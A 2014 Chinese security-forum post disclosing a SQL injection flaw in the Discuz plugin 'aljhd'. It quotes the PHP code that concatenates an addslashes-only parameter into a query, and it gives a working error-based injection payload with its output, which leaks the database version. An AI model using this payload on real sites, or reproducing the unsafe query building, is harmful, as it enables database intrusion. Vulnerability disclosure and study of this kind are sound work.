查看: 10504|回复: 0

Discuz某插件sql注射漏洞

[复制链接]
  • TA的每日心情
    无聊
    2015-7-8 20:25
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-3-23 12:05:35 | 显示全部楼层 |阅读模式
    Author:Saline
    Email:Nophacker@gmail.com
    文件source/plugin/aljhd/aljhd.inc.php122行附近
    [PHP] 纯文本查看 复制代码
    }else{
        $ymlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym();
        $typelist=C::t('#aljhd#alj_hd')->fetch_all_by_type();
         
        $currpage=$_GET['page']?$_GET['page']:1;
        $perpage=$config['page'];
        $num=C::t('#aljhd#alj_hd')->count_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status']);
        $start=($currpage-1)*$perpage;
        $hdlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status'],$start,$perpage);
        $paging = helper_page :: multi($num, $perpage, $currpage, 'plugin.php?id=aljhd&ym='.$_GET['ym'].'&type='.$_GET['type'].'&status='.$_GET['status'], 0, 11, false, false);
         
        include template('aljhd:index');
    }

    然后其中的fetch_all_by_ym fetch_all_by_type fetch_all_by_ym_type_status count_by_ym_type_status几个函数在
    文件source/plugin/aljhd/table/table_alj_hd.php中找到了
    [PHP] 纯文本查看 复制代码
    class table_alj_hd extends discuz_table
    {
        public function __construct() {
     
            $this->_table = 'alj_hd';
            $this->_pk    = 'id';
     
            parent::__construct();
        }
        public function count_by_ym_type_status($ym,$type,$status){
            $where=' where 1';
            if($ym){
                $where.=' and ym='.addslashes($ym); //对$ym进行了addslashes转换
            }
            .......
            return DB::result_first('select count(*) from %t '.$where,array($this->_table));
        }
        public function fetch_all_by_ym_type_status($ym,$type,$status,$start,$perpage){
            $where=' where 1';
            if($ym){
                $where.=" and ym='".addslashes($ym)."'";//对$ym进行了addslashes转换
            }
             
            $where.=' order by endtime desc';
            if($perpage){
                $where.=" limit $start,$perpage";
            }
             //拼接出来的语句就是 select count(*) from alj_hd where 1 and  ym='.addslashes($ym) and type='.intval($type) and starttime<='.TIMESTAMP.' and endtime>='.TIMESTAMP;
            return DB::fetch_all('select * from %t '.$where,array($this->_table));
        }
        public function fetch_all_by_ym(){
            return DB::fetch_all('select ym,count(*) num from %t group by ym order by ym desc',array($this->_table));
        }
        public function fetch_all_by_type(){
            return DB::fetch_all('select type,count(*) num from %t group by type',array($this->_table));
        }
    }

    发现对其中的ym仅仅是做了addslashes处理,我们知道的addslashes编码仅仅是在gbk下才有作用,所有整个显得鸡肋
    [PHP] 纯文本查看 复制代码
    select count(*) from alj_hd where 1 and ym=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and type=1
     
    result:
     
    (1062) Duplicate entry '5.5.29-log1' for key 'group_key'


    评分

    参与人数 1i币 +10 收起 理由
    90_ + 10 感谢分享

    查看全部评分

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 20:37 , Processed in 0.026811 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部